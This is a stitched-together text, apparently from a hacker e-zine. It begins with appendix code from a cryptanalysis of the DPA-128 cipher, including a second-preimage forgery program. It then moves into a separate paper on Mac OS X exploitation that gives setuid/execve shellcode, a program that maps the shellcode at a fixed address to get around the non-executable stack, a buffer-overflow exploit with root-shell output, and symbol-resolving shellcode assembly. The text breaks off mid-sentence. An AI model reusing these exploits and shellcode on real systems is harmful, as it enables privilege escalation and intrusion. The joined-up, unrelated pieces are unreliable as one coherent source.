  /* Compare the two vectors */
  if (!memcmp(test_c1,test_c2,16))
    printf("\t=> Well done boy :>\n");
  else
    printf("\t=> Hell !@#\n");

#ifdef __debug__
  affichage(test_c1);
  affichage(test_c2);
#endif
  return 0;
}
8< 8< 8< 8< 8< 8< 
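The listing above relies on one property: once the substitution is
linearised, the cipher is affine over GF(2), so E(x) ^ E(y) depends only
on x ^ y. The sketch below illustrates that property on a toy 8-bit map.
The names toy_encrypt and affine_prediction_holds, the rotation amount
and the key byte are hypothetical stand-ins chosen for illustration;
they are not part of DPA-128.

```c
#include <stdint.h>

/* Rotate an 8-bit value left by n bits (0 < n < 8); linear over GF(2). */
static uint8_t rotl8(uint8_t v, unsigned n) {
    return (uint8_t)((v << n) | (v >> (8 - n)));
}

/* Hypothetical toy "cipher": a linear layer followed by a key XOR,
 * i.e. an affine map, like the linearised rounds. */
static uint8_t toy_encrypt(uint8_t x, uint8_t key) {
    return (uint8_t)(rotl8(x, 3) ^ key);
}

/* Returns 1 if one known pair (u, E(u)) plus the linear part alone
 * predicts the ciphertext of every other plaintext, 0 otherwise. */
static int affine_prediction_holds(uint8_t key) {
    uint8_t u = 0x41;
    uint8_t yu = toy_encrypt(u, key);
    for (int p = 0; p < 256; p++) {
        uint8_t delta_x = (uint8_t)(p ^ u);
        uint8_t delta_y = rotl8(delta_x, 3);   /* linear part only, no key */
        if ((uint8_t)(delta_y ^ yu) != toy_encrypt((uint8_t)p, key))
            return 0;
    }
    return 1;
}
```

In the real attack the linear part is not known in advance, which is why
the listing recovers it as the matrix Mf from 128 independent
plaintext/ciphertext differences before predicting test_c2.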
--[ Annexe B - Probability evaluation of (hash32()%8 == 0)
8< 8< 8< 8< 8< 8<

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* checksum128() and hash32() come from the DPA sources */

#define NBR_TESTS 0xFFFFF

int main()
{
  int i = 0, j = 0;
  char buffer[16];
  int cmpt = 0;
  int rand = (int)time(NULL);
  float proba = 0;
  srandom(rand);

  for (; i<NBR_TESTS; i++)
    {
      /* Fill the 16 byte buffer with four random words */
      for (j=0; j<4; j++)
        {
          rand = random();
          memcpy(buffer+4*j, &rand, 4);
        }
      checksum128(buffer, buffer, 16);
      if (!(hash32(buffer,16)%8))
        cmpt++;
    }
  proba = (float)cmpt/(float)NBR_TESTS;
  printf("[+] Probability is around %f\n", proba);
  return 0;
}
8< 8< 8< 8< 8< 8<
--[ Annexe C - 2nd preimage attack on 32 bytes messages
8< 8< 8< 8< 8< 8<

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include "dpa.h"

void
E2 (unsigned char *key, unsigned char *block, unsigned int shift)
{
  rbytechain (block);
  rbitshift (block, shift);
  S_E (key, block, shift);
}

void
DPA_ecb_encrypt (DPA_KEY * key, unsigned char * src, unsigned char * dst)
{
  int j;

  memcpy (dst, src, DPA_BLOCK_SIZE);
  for (j = 0; j < 16; j++)
    E2 (key->subkey[j].key, dst, key->subkey[j].shift);
  return;
}

void affichage (unsigned char *chaine)
{
  int i;

  for (i=0; i<16; i++)
    printf ("%.2x", (unsigned char)chaine[i]);
  printf ("\n");
}

int main(int argc, char **argv)
{
  DPA_KEY key;
  unsigned char str_key[] = "deadbeef";
  unsigned char IV[] = "0123456789abcdef";
  unsigned char evil_payload[] = "COMPLETELYBROKEN";
  unsigned char D0[16], D1[16];
  unsigned char final_message[32];
  int fd_r = 0;
  int i = 0;

  if (argc < 2)
    {
      printf ("Usage : %s <file>\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  DPA_set_key (&key, str_key, 8);

  if ((fd_r = open(argv[1], O_RDONLY)) < 0)
    {
      printf ("[+] Fuck !@#\n");
      exit (EXIT_FAILURE);
    }

  if (read(fd_r, D0, 16) != DPA_BLOCK_SIZE)
    {
      printf ("Too short !@#\n");
      exit (EXIT_FAILURE);
    }

  if (read(fd_r, D1, 16) != DPA_BLOCK_SIZE)
    {
      printf ("Too short 2 !@#\n");
      exit (EXIT_FAILURE);
    }

  close (fd_r);

  /* First block of the forged message is our payload */
  memcpy (final_message, evil_payload, DPA_BLOCK_SIZE);
  blockchain (evil_payload, IV);
  DPA_ecb_encrypt (&key, evil_payload, evil_payload);
  blockchain (D0, IV);
  DPA_ecb_encrypt (&key, D0, D0);
  blockchain (D0, D1);
  blockchain (evil_payload, D0);
  /* Second block steers the chain back onto the original state */
  memcpy (final_message+DPA_BLOCK_SIZE, evil_payload, DPA_BLOCK_SIZE);

  for (i=0; i<DPA_BLOCK_SIZE*2; i++)
    printf ("%c", final_message[i]);
  return 0;
}
8< 8< 8< 8< 8< 8<
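The block arithmetic in the listing above can be checked on a toy model.
The sketch below assumes, as the listing suggests, a CBC-style chaining
of the form state = E(state ^ block) with a publicly known key. The 8-bit
toy_E, toy_hash2 and second_block are hypothetical illustrations, not
the DPA functions themselves.

```c
#include <stdint.h>

/* Hypothetical 8-bit block "cipher" with a publicly known key. */
static uint8_t toy_E(uint8_t x, uint8_t key) {
    return (uint8_t)((uint8_t)(x ^ key) * 167u + 13u);
}

/* Assumed chaining over two blocks: state = E(state ^ block), from IV. */
static uint8_t toy_hash2(uint8_t iv, uint8_t key, uint8_t b0, uint8_t b1) {
    uint8_t state = toy_E((uint8_t)(iv ^ b0), key);
    return toy_E((uint8_t)(state ^ b1), key);
}

/* Given the original blocks (d0, d1) and a freely chosen first block
 * `evil`, compute the second block that puts the chain back onto the
 * state reached by the original message. */
static uint8_t second_block(uint8_t iv, uint8_t key,
                            uint8_t d0, uint8_t d1, uint8_t evil) {
    uint8_t s_orig = toy_E((uint8_t)(iv ^ d0), key);
    uint8_t s_evil = toy_E((uint8_t)(iv ^ evil), key);
    return (uint8_t)(s_evil ^ s_orig ^ d1);
}
```

With x = second_block(iv, key, d0, d1, evil), the messages (d0, d1) and
(evil, x) feed the same value into the last encryption, so they hash to
the same result whatever the cipher is.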
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--[ 1 - Introduction 
This paper was written in order to document my research while
playing with Mac OS X shellcode. During this process, however,
the paper mutated and evolved to cover a selection of Mac OS X
related topics which will hopefully make for an interesting read.

Due to the growing popularity of Mac OS X on Intel over PowerPC
platforms, I have mostly focused on techniques for the former.
Many of the concepts shown are still applicable on PowerPC
architecture, but their particular implementation is left as
an exercise for the reader.

There are already several well written documents on PowerPC and
Intel assembly language; I will therefore make no attempt to try
and teach you these things.

If you have any suggestions on how to shorten/tighten the code I
have written for this paper please drop me an email with the
details at: nemo@felinemenace.org.

A tar file containing the full code listings referenced in this
paper can be found in Appendix A.
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--[ 2 - Local shellcode maneuvering. 


Over the years there have been many different techniques 
developed to calculate valid return addresses when 
exploiting buffer overflows in applications local to 
your system. Unfortunately many of these techniques are 
now obsolete on Intel-based Mac OS X systems with the 
introduction of a non-executable stack in version 10.4 
(Tiger). 


In the following subsections I will discuss a few historical
approaches for calculating shellcode addresses in memory
and introduce a new method for positioning shellcode at a
fixed location in the address space of a vulnerable target
process.


--[ 2.1 Historical perspective 1: Aleph1


Over the years there have been many different techniques
developed to calculate a valid return address when exploiting
a buffer overflow in an application local to your system.
The most widely known of these is shown in aleph1's "Smashing
the Stack for Fun and Profit" [9]. In this paper, aleph1 simply
writes a small function get_sp() shown below.

unsigned long get_sp(void) {
        __asm__("movl %esp, %eax");
}

This function returns the current stack pointer (esp).
aleph1 then simply offsets from this value, in an attempt to hit
the nop sled before his shellcode on the stack. This method is
not as precise as it can be, and also requires the shellcode to
be stored on the stack. This is an obvious issue if your stack is
non-executable.


--[ 2.2 Historical perspective 2: Radical Environmentalist 


Another method for storing shellcode and calculating the address 
of it inside another process is shown in the Radical 
Environmentalist paper written by the Netric Security Group [10]. 


In this paper, the author shows that the execve() syscall allows 
full control over the stack of the freshly executed process. 
Because of this, shellcode can be stored in an environment 
variable, the address of which can be calculated as displacement 
from the top of the stack. 


In older exploits for Mac OS X (prior to 10.4), this technique 
worked quite well. Since there is no non-executable stack on 
PowerPC 


--[ 2.3 Beating stack prot :P or whatever 


In KF's paper "Non eXecutable Stack Loving on Mac OS X86" [11],
the author demonstrates a technique for removing stack protection
by returning into mprotect() in libSystem (libc) before
returning into their payload. While this technique is very useful
for remote exploitation, a more elegant solution to this problem
exists for local exploitation.

The first step to getting our shellcode in place is to get some
shellcode. There has already been significant published work
in this area. If you are interested in learning how to write
shellcode for Mac OS X for use in local privilege escalation
exploits, a couple of papers you should definitely check out are
shown in the references section, [1] and [8]. The shellcode
chosen for the sample code is described in full in section 2


The method which I now propose relies on the undocumented
Mac OS X system call "shared_region_map_file_np".
This syscall is used at runtime by the dynamic loader (dyld)
to map widely used libraries across the address space of every
process on the system; this functionality has many evil uses.

The file /usr/include/sys/syscall.h contains the syscall
number for each of the syscalls. Here is the appropriate
line in that file which contains our syscall.

#define SYS_shared_region_map_file_np 299

Here is the prototype for this syscall:

struct shared_region_map_file_np(
        int fd,
        uint32_t mappingCount,
        user_addr_t mappings,
        user_addr_t slide_p
);


The arguments to this syscall are very simple:

fd             an open file descriptor, providing access to data that
               we want loaded in memory.
mappingCount   the number of mappings which we want to make from the
               file.
mappings       a pointer to an array of _shared_region_mapping_np
               structs which describe each mapping (see below).
slide_p        determines whether the syscall is allowed to slide
               the mapping around inside the shared region of memory
               to make it fit.


Here is the struct definition for the elements of the third argument: 


struct _shared_region_mapping_np { 


mach_vm_address_t address; 
mach_vm_size_t size; 
mach_vm_offset_t file_offset; 
vm_prot_t max_prot; 
vm_prot_t init_prot; 


}; 


The struct elements shown above can be explained as follows:

address        the address in the shared region where the data should
               be stored.
size           the size of the mapping (in bytes)
file_offset    the offset into the file descriptor to which we must
               seek in order to reach the start of our data.
max_prot       This is the maximum protection of the mapping,
               this value is created by or'ing the #defines:
               VM_PROT_EXECUTE, VM_PROT_READ, VM_PROT_WRITE and VM_COW.
init_prot      This is the initial protection of the mapping, again
               this is created by or'ing the values mentioned above.

The following #define's describe the shared region in which
we can map our data. They show the various regions within the
0x00000000->0xffffffff address space which are available to
use as shared regions. These are shown as defined as starting
point, followed by size.

#define SHARED_LIBRARY_SERVER_SUPPORTED
#define GLOBAL_SHARED_TEXT_SEGMENT      0x90000000
#define GLOBAL_SHARED_DATA_SEGMENT      0xA0000000
#define GLOBAL_SHARED_SEGMENT_MASK      0xF0000000

#define SHARED_TEXT_REGION_SIZE         0x10000000
#define SHARED_DATA_REGION_SIZE         0x10000000
#define SHARED_ALTERNATE_LOAD_BASE      0x09000000


To reduce the chance that our shellcode will be stored at an
address that contains a NULL byte (thereby keeping this
technique viable for string based overflows), we position the
shellcode at the last address in the region where a page
(0x1000 bytes) can be mapped. By doing so, our shellcode will
be stored at the address 0x9ffffxxx.
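The address arithmetic behind this placement is easy to check by hand.
The sketch below uses the BASE_ADDR and PAGESIZE values from
sharedcode.c; the helper names payload_address and is_null_free are
hypothetical and only serve the illustration.

```c
#include <stdint.h>

#define BASE_ADDR 0x9ffff000u   /* last page of the shared text region */
#define PAGESIZE  0x1000u

/* Address of a payload of `len` bytes placed at the very end of the page. */
static uint32_t payload_address(uint32_t len) {
    return BASE_ADDR + PAGESIZE - len;
}

/* Returns 1 if none of the four bytes of `addr` is zero. */
static int is_null_free(uint32_t addr) {
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xffu) == 0)
            return 0;
    return 1;
}
```

A payload of 0x8f bytes lands at 0x9fffff71, which passes the check. A
payload whose length is a multiple of 0x100 would still end up with a
zero low byte, so the length matters as well as the page.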


The following code can be used to map some shellcode into
a fixed location by opening the file "/tmp/mapme" and writing
our shellcode out to it. It then uses the file descriptor
to call the "shared_region_map_file_np" which maps the
code, as well as a bunch of int3's (cc), into the shared
region.


/*
 * [ sharedcode.c ]
 * by nemo@felinemenace.org 2007
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <mach/vm_prot.h>
#include <mach/i386/vm_types.h>
#include <mach/shared_memory_server.h>
#include <string.h>
#include <unistd.h>

#define BASE_ADDR 0x9ffff000
#define PAGESIZE  0x1000
#define FILENAME  "/tmp/mapme"

char dual_sc[] =
"\x5f\x90\xeb\x60"

// setuid() seteuid()
"\x38\x00\x00\xb7\x38\x60\x00\x00"
"\x44\x00\x00\x02\x38\x00\x00\x17"
"\x38\x60\x00\x00\x44\x00\x00\x02"

// ppc execve() code by b-r00t
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58"

// seteuid(0);
"\x31\xc0\x50\xb0\xb7\x6a\x7f\xcd"
"\x80"

// setuid(0);
"\x31\xc0\x50\xb0\x17\x6a\x7f\xcd"
"\x80"

// x86 execve() code / nemo
"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
"\x54\x54\x53\x53\xb0\x3b\xcd\x80";

struct _shared_region_mapping_np {
        mach_vm_address_t address;
        mach_vm_size_t    size;
        mach_vm_offset_t  file_offset;
        vm_prot_t         max_prot;   /* read/write/execute/COW/ZF */
        vm_prot_t         init_prot;  /* read/write/execute/COW/ZF */
};

int main(int argc,char **argv)
{
        int fd;
        struct _shared_region_mapping_np sr;
        char data[PAGESIZE];
        char *ptr = data + PAGESIZE - sizeof(dual_sc);

        /* pad the whole page with int3 (0xcc) */
        memset(data, 0xcc, sizeof(data));

        sr.address     = BASE_ADDR;
        sr.size        = PAGESIZE;
        sr.file_offset = 0;
        sr.max_prot    = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE;
        sr.init_prot   = VM_PROT_EXECUTE | VM_PROT_READ | VM_PROT_WRITE;

        /* O_CREAT needs an explicit mode argument */
        if((fd=open(FILENAME,O_RDWR|O_CREAT,0644))==-1)
        {
                perror("open");
                exit(EXIT_FAILURE);
        }

        /* the shellcode sits at the very end of the page */
        memcpy(ptr,dual_sc,sizeof(dual_sc));

        if(write(fd,data,PAGESIZE) != PAGESIZE)
        {
                perror("write");
                exit(EXIT_FAILURE);
        }

        if(syscall(SYS_shared_region_map_file_np,fd,1,&sr,NULL)==-1)
        {
                perror("shared_region_map_file_np");
                exit(EXIT_FAILURE);
        }

        close(fd);
        unlink(FILENAME);

        printf("[+] shellcode at: 0x%x.\n",
               (unsigned int)(sr.address + PAGESIZE - sizeof(dual_sc)));

        exit(EXIT_SUCCESS);
}


When we compile and execute this code, it prints the address of
the shellcode in memory. You can see this below.

-[nemo@fry:~/code]$ gcc sharedcode.c -o sharedcode
-[nemo@fry:~/code]$ ./sharedcode
[+] shellcode at: 0x9fffff71.

As you can see the address used for our shellcode is 0x9fffff71.
This address, as expected, is free of NULL bytes.


You can test that this procedure has worked as expected by
starting a new process and connecting to it with gdb.
By jumping to this address using the "jump" command in gdb
our shellcode is executed and a bash prompt is displayed.

-[nemo@fry:~/code]$ gdb /usr/bin/id
GNU gdb 6.3.50-20050815 (Apple version gdb-563)
(gdb) r
Starting program: /usr/bin/id
^C[Switching to process 752 local thread 0xf03]
0x8fe01010 in __dyld__dyld_start ()
Quit
(gdb) jump *0x9fffff71
Continuing at 0x9fffff71.
(gdb) c
Continuing.
-[nemo@fry:Users/nemo/code]$


In order to demonstrate how this can be used in an exploit,
I have created a trivially exploitable program:

/*
 * exploitme.c
 */

#include <stdio.h>
#include <string.h>

int main(int ac, char **av)
{
        char buf[50] = { 0 };

        printf("%s",av[1]);
        if(ac == 2)
                strcpy(buf,av[1]);

        return 1;
}

Below is the exploit for the above program.

/*
 * [ exp.c ]
 * nemo@felinemenace.org 2007
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VULNPROG  "./exploitme"
#define OFFSET    66
#define FIXEDADDR 0x9fffff71

int main(int ac, char **av)
{
        char evilbuff[OFFSET];
        char *args[] = {VULNPROG,evilbuff,NULL};
        char *env[] = {"TERM=xterm",NULL};
        long *ptr = (long *)&(evilbuff[OFFSET - 4]);

        memset(evilbuff,'A',OFFSET);
        *ptr = FIXEDADDR;

        execve(*args,args,env);
        return 1;
}

As you can see we fill the buffer up with "A"'s, followed by our
return address calculated by sharedcode.c. After the strcpy() occurs
our stored return address on the stack is overwritten with our new
return address (0x9fffff71) and our shellcode is executed.

If we chown root ./exploitme; chmod +s ./exploitme; we can see
that our shellcode is mapped into suid processes, which makes
this technique feasible for local privilege escalation. Also,
because we control the memory protection on our mapping, we bypass
non-executable stack protection.

-[nemo@fry:/]$ ./exp
fry:/ root# id
uid=0(root)


One limitation of this technique is that the file you are
mapping into the shared region must exist on the root
filesystem. This is clearly explained in the comment below.

/*
 * The split library is not on the root filesystem. We don't
 * want to pollute the system-wide ("default") shared region
 * with it.
 * Reject the mapping. The caller (dyld) should "privatize"
 * (via shared_region_make_private()) the shared region and
 * try to establish the mapping privately for this process.
 */

Another limitation to this technique is that Apple have locked
down this syscall with the following lines of code:

/*
 * This system call is for "dyld" only.
 */

Luckily we can beat this magnificent protection by....
completely ignoring it.


--[ 3 - Resolving Symbols From Shellcode


In this section I will demonstrate a method which can be used to
resolve the address of a symbol from shellcode.

This is useful in remote exploitation where you wish to access
or modify some of the functionality of the vulnerable program.
This may also be useful in calling some of the functions in a
particular shared library in the address space.

The examples in this section are written in Intel assembly, nasm
syntax. The concepts presented can easily be recreated in
PowerPC assembler. If anyone takes the time to do this let me
know.

The method I will describe requires some basic knowledge about
the Mach-O object format and how symbols are stored/resolved.
I will try to be as verbose as I can, however if more research
is required check out the Mach-O Runtime document from the
Apple website. [4]


The process of resolving symbols which I am describing in this 
section involves locating the LINKEDIT section in memory. 


The LINKEDIT section is broken up into a symbol table (symtab) 
and string table (strtab) as follows: 


        [ LINKEDIT SECTION ]

 low memory: 0x0
 .________________________________,
 |---(symtab data starts here.)---|
 |<nlist struct>                  |
 |<nlist struct>                  |
 |<nlist struct>                  |
 |---(strtab data starts here.)---|
 |"__mh_execute_header\0"         |
 |"dyld_start\0"                  |
 |"main"                          |
 '--------------------------------'
 himem : 0xffffffff


By locating the start of the string table and the start of the
symbol table relative to the address of the LINKEDIT section
it is then possible to loop through each of the nlist structures
in the symbol table and access their appropriate string in the
string table. I will now run through this technique in fine
detail.

To resolve symbols we will start by locating the mach_header in
memory. This will be the start of our mapped in mach-o image.
One way to find this is to run the "nm" command on our binary
and locate the address of the __mh_execute_header symbol.

Currently on Mac OS X, the executable is simply mapped in at
the start of the first page, 0x1000.

We can verify this as follows:

-[nemo@fry:~]$ nm /bin/sh | grep mh_
00001000 A __mh_execute_header

(gdb) x/x 0x1000
0x1000: 0xfeedface

As you can see the magic number (0xfeedface) is at 0x1000.
This is our Mach-O header. The struct for this is shown
below:

struct mach_header
{
        uint32_t      magic;
        cpu_type_t    cputype;
        cpu_subtype_t cpusubtype;
        uint32_t      filetype;
        uint32_t      ncmds;
        uint32_t      sizeofcmds;
        uint32_t      flags;
};


In my shellcode I assume that the file we are parsing always
has a LINKEDIT section and a symbol table load command
(LC_SYMTAB). This means that I do not bother parsing the
mach_header struct. However if you do not wish to make this
assumption, it is easy enough to loop ncmds number of times
while parsing the load commands.

Directly after the mach_header struct in memory are a bunch
of load_commands. Each of these commands begins with a "cmd"
id field, and the size of the command.

Therefore, we start our code by setting ecx to the address of
the first load command, directly after the mach_header struct
in memory. This positions us at 0x101c. We then null out some
of the registers to use later in the code.

    ;# null out some stuff (ebx,edx,eax)
    xor ebx,ebx
    mul ebx
    ;# position ecx past the mach_header.
    xor ecx,ecx
    mov word cx,0x101c

For symbol resolution, we are only interested in LC_SEGMENT
commands and the LC_SYMTAB. In particular we are looking for
the LINKEDIT LC_SEGMENT struct. This is explained in more
detail later.

The #define's for these are in /usr/include/mach-o/loader.h
as follows:

#define LC_SEGMENT 0x1
        /* segment of this file to be mapped */
#define LC_SYMTAB  0x2
        /* link-edit stab symbol table info */

The LC_SYMTAB command uses the following struct:

struct symtab_command
{
        uint32_t cmd;
        uint32_t cmdsize;
        uint32_t symoff;
        uint32_t nsyms;
        uint32_t stroff;
        uint32_t strsize;
};

The symoff field holds the offset from the start of the file to
the symbol table. The stroff field holds the offset to the string
table. Both the symbol table and string table are contained in
the LINKEDIT section.

By subtracting the symoff from the stroff we get the offset into
the LINKEDIT section in which to read our strings. The nsyms
field can be used as a loop count when enumerating the symtab.
For the sake of this sample code, however, I have assumed that
the symbol exists and ignored the nsyms field entirely.

We find the LC_SYMTAB command simply by looping through and
checking the "cmd" field for 0x2.

The LINKEDIT section is slightly harder to find; we need to look
for a load command with the cmd type 0x1 (segment_command),
then check for the name "__LINKEDIT" in the segname field of
the struct. The segment_command struct is shown below:

struct segment_command
{
        uint32_t  cmd;
        uint32_t  cmdsize;
        char      segname[16];
        uint32_t  vmaddr;
        uint32_t  vmsize;
        uint32_t  fileoff;
        uint32_t  filesize;
        vm_prot_t maxprot;
        vm_prot_t initprot;
        uint32_t  nsects;
        uint32_t  flags;
};


I will now run through an explanation of the assembly code
used to accomplish this technique.

I have used a trivial state machine to loop through each
load_command until both the symbol table and LINKEDIT virtual
addresses have been found.
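For readers who prefer C to assembly, the same walk over the load
commands can be sketched as follows. The struct layouts are reduced
local copies of the 32-bit definitions shown earlier, and the function
names and the fake command list built by demo_walk are hypothetical
illustrations, not code from the shellcode itself.

```c
#include <stdint.h>
#include <string.h>

#define LC_SEGMENT 0x1
#define LC_SYMTAB  0x2

/* Minimal local copies of the 32-bit layouts described in the text. */
struct load_cmd   { uint32_t cmd, cmdsize; };
struct seg_cmd    { uint32_t cmd, cmdsize; char segname[16];
                    uint32_t vmaddr, vmsize, fileoff, filesize;
                    uint32_t maxprot, initprot, nsects, flags; };
struct symtab_cmd { uint32_t cmd, cmdsize, symoff, nsyms, stroff, strsize; };

/* Walk `ncmds` load commands starting at `p`. Stores pointers to the
 * __LINKEDIT segment command and the LC_SYMTAB command; returns 1 if
 * both were found. */
static int find_linkedit_and_symtab(const uint8_t *p, uint32_t ncmds,
                                    const struct seg_cmd **linkedit,
                                    const struct symtab_cmd **symtab) {
    *linkedit = NULL;
    *symtab = NULL;
    for (uint32_t i = 0; i < ncmds; i++) {
        const struct load_cmd *lc = (const struct load_cmd *)p;
        if (lc->cmd == LC_SYMTAB)
            *symtab = (const struct symtab_cmd *)p;
        else if (lc->cmd == LC_SEGMENT &&
                 strncmp(((const struct seg_cmd *)p)->segname,
                         "__LINKEDIT", 16) == 0)
            *linkedit = (const struct seg_cmd *)p;
        p += lc->cmdsize;   /* same step as "add ecx,[ecx + 0x4]" */
    }
    return *linkedit != NULL && *symtab != NULL;
}

/* Build a tiny fake command list (__TEXT, LC_SYMTAB, __LINKEDIT) with
 * made-up addresses and walk it. Returns 1 on success. */
static int demo_walk(void) {
    static uint32_t storage[64];    /* uint32_t keeps the structs aligned */
    uint8_t *buf = (uint8_t *)storage;
    struct seg_cmd text = { LC_SEGMENT, sizeof text, "__TEXT",
                            0x1000, 0x1000 };
    struct symtab_cmd st = { LC_SYMTAB, sizeof st, 0x3000, 2, 0x3018, 0x20 };
    struct seg_cmd le = { LC_SEGMENT, sizeof le, "__LINKEDIT",
                          0x4000, 0x1000, 0x3000 };
    const struct seg_cmd *linkedit;
    const struct symtab_cmd *symtab;

    memcpy(buf, &text, sizeof text);
    memcpy(buf + sizeof text, &st, sizeof st);
    memcpy(buf + sizeof text + sizeof st, &le, sizeof le);

    if (!find_linkedit_and_symtab(buf, 3, &linkedit, &symtab))
        return 0;
    return linkedit->vmaddr == 0x4000 &&
           symtab->stroff - symtab->symoff == 0x18;
}
```

Unlike the shellcode, this version takes an explicit command count and
compares the full segment name, trading size for safety.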


First we check which type of load_command each is and then we 
jump to the appropriate handler, if it is one of the types we 
need. 


next_header:
    cmp byte [ecx],0x2       ;# test for LC_SYMTAB (0x2)
    je found_lcsymtab
    cmp byte [ecx],0x1       ;# test for LC_SEGMENT (0x1)
    je found_lcsegment

The next two instructions add the length field of the
load_command to our pointer. This positions us over the cmd
field of the next load_command in memory. We jump back up
to the next_header symbol and compare again.

next:
    add ecx,[ecx + 0x4]      ;# ecx += length
    jmp next_header

The found_lcsymtab handler is called when we have a cmd == 0x2.


We make the assumption that there’s only one LC_SYMTAB. We can 
use the fact that if we’re here, eax hasn’t been set yet and is 0. 
By comparing this with edx we can see if the LINKEDIT segment has 
been found. After the cmp, we update eax with the address of the 
LC_SYMTAB. If both the LINKEDIT and LC_SYMTAB sections have been 
found, we jmp to the "found_both" symbol, otherwise we process 
the next header. 


found_lcsymtab: 


cmp eax, edx ;# use the fact that eax is 0 to test edx. 
mov eax, ecx ;# update eax with current pointer. 

jne found_both ;# we have found LINKEDIT and LC_SYMTAB 
jmp next ;# keep looking for LINKEDIT 


The found_lcsegment handler is very similar to the
found_lcsymtab code. However, since there are many LC_SEGMENT
commands in most files we need to be sure that we've found
the __LINKEDIT section.

To do this we add 8 to the struct pointer to get to the
segname[] string. We then check 2 characters in, skipping
the "__", for the 4 bytes "LINK" (0x4b4e494c, accounting for
endian issues). Again, we use the fact that there should
only be one LINKEDIT section. This means that if we are
past the check for "LINK" edx is 0. We use this to test
eax, to see if the LC_SYMTAB command has been found.
Again if we are done we jmp to found_both, if not back
up to the "next_header" symbol.

found_lcsegment:
    lea esi,[ecx + 0x8]      ;# get pointer to name
    ;# test for "LINK"
    cmp dword [esi + 0x2],0x4b4e494c
    jne next                 ;# it's not LINKEDIT, NEXT!
    cmp edx,eax              ;# use zero'ed edx to test eax
    mov edx,ecx              ;# set edx to current address
    jne found_both           ;# we're done!
    jmp next                 ;# still need to find
                             ;# LC_SYMTAB, continue

;# EDX = LINKEDIT struct

;# EAX = LC_SYMTAB struct

Now that we have our pointers to LINKEDIT and LC_SYMTAB, we can
subtract symtab_command.symoff from symtab_command.stroff to
obtain the offset of the strings table from the start of LINKEDIT.
By adding this offset to LINKEDIT's virtual address, we have now
calculated the virtual address of the string table in memory.

found_both:
    mov edi,[eax + 0x10]     ;# EDI = stroff
    sub edi,[eax + 0x8]      ;# EDI -= symoff
    mov esi,[edx + 0x18]     ;# esi = VA of linkedit
    add edi,esi              ;# add virtual address of LINKEDIT to offset

The LINKEDIT section contains a list of "struct nlist" structures.
Each one corresponds to a symbol. The first union contains an offset
into the string table (which we have the VA for). In order to find the
symbol we want we simply cycle through the array and offset our
string table pointer to test the string.

struct nlist
{
        union {
#ifndef __LP64__
                char *n_name;
#endif
                int32_t n_strx;
        } n_un;
        uint8_t  n_type;
        uint8_t  n_sect;
        int16_t  n_desc;
        uint32_t n_value;
};
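The walk over the nlist array can be sketched in C with plain string
comparison. The nlist32 struct below is a reduced copy of the 32-bit
layout above, and the tables inside demo_lookup (names, offsets and
addresses) are made up for illustration.

```c
#include <stdint.h>
#include <string.h>

/* 32-bit nlist layout, with n_un reduced to the string table index. */
struct nlist32 {
    int32_t  n_strx;    /* offset of the name inside the string table */
    uint8_t  n_type;
    uint8_t  n_sect;
    int16_t  n_desc;
    uint32_t n_value;   /* address of the symbol */
};

/* Linear search: return n_value of `name`, or 0 if it is not present. */
static uint32_t lookup_symbol(const struct nlist32 *symtab, uint32_t nsyms,
                              const char *strtab, const char *name) {
    for (uint32_t i = 0; i < nsyms; i++)
        if (strcmp(strtab + symtab[i].n_strx, name) == 0)
            return symtab[i].n_value;
    return 0;
}

/* Fake tables for illustration only. */
static uint32_t demo_lookup(const char *name) {
    static const char strtab[] = "\0__mh_execute_header\0_main\0_do_payload";
    static const struct nlist32 symtab[] = {
        {  1, 0x0f, 1, 0, 0x1000 },   /* __mh_execute_header */
        { 21, 0x0f, 1, 0, 0x1f00 },   /* _main */
        { 27, 0x0f, 1, 0, 0x1f06 },   /* _do_payload */
    };
    return lookup_symbol(symtab, 3, strtab, name);
}
```

Each entry is 12 bytes, which is the 0xc added to esi in the assembly
when stepping to the next nlist.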


Now that we are able to walk through our nlist structs we are good
to go. However it wouldn't make sense to store the full symbol
name in our shellcode as this would make the code larger than it
already is.

I have chosen to steal^H^H^H^H^Huse skape's "compute_hash" function
from "Understanding Windows Shellcode" [5]. He explains how the
code works in his paper.

The following code shows a simple loop. First we jump down to the
"hashes" symbol, and call back up to get a pointer to our list of
hashes. We read the first hash in, and then loop through each of
the nlist structures, hashing the symbol found and comparing it
against our precomputed hash.

If the hash is unsuccessful we jump back up to "check_next_hash",
however if it's successful we continue down to the "done" symbol.

;# esi == constant pointer to nlist
;# edi == strtab base
lookup_symbol:
    jmp hashes
lookup_symbol_up:
    pop ecx
    mov ecx,[ecx]            ;# ecx = first hash
check_next_hash:
    push esi                 ;# save nlist pointer
    push edi                 ;# save VA of strtable
    mov esi,[esi]            ;# *esi = offset from strtab to string
    add esi,edi              ;# add VA of strtab
compute_hash:
    xor edi,edi
    xor eax,eax
    cld
compute_hash_again:
    lodsb
    test al,al               ;# test if on the last byte.
    jz compute_hash_finished
    ror edi,0xd
    add edi,eax
    jmp compute_hash_again
compute_hash_finished:
    cmp edi,ecx
    pop edi
    pop esi
    je done
    lea esi,[esi + 0xc]      ;# Add sizeof(struct nlist)
    jmp check_next_hash
done:


Each hash we wish to resolve can be appended after the hashes: symbol. 


;# hash in edi
hashes:
    call lookup_symbol_up
    dd 0x8bd2d84d


Now that we have the address of our symbol we’re all done and can 
call our function, or modify it as we need. 


In order to calculate the hash for our required symbol, I have cut
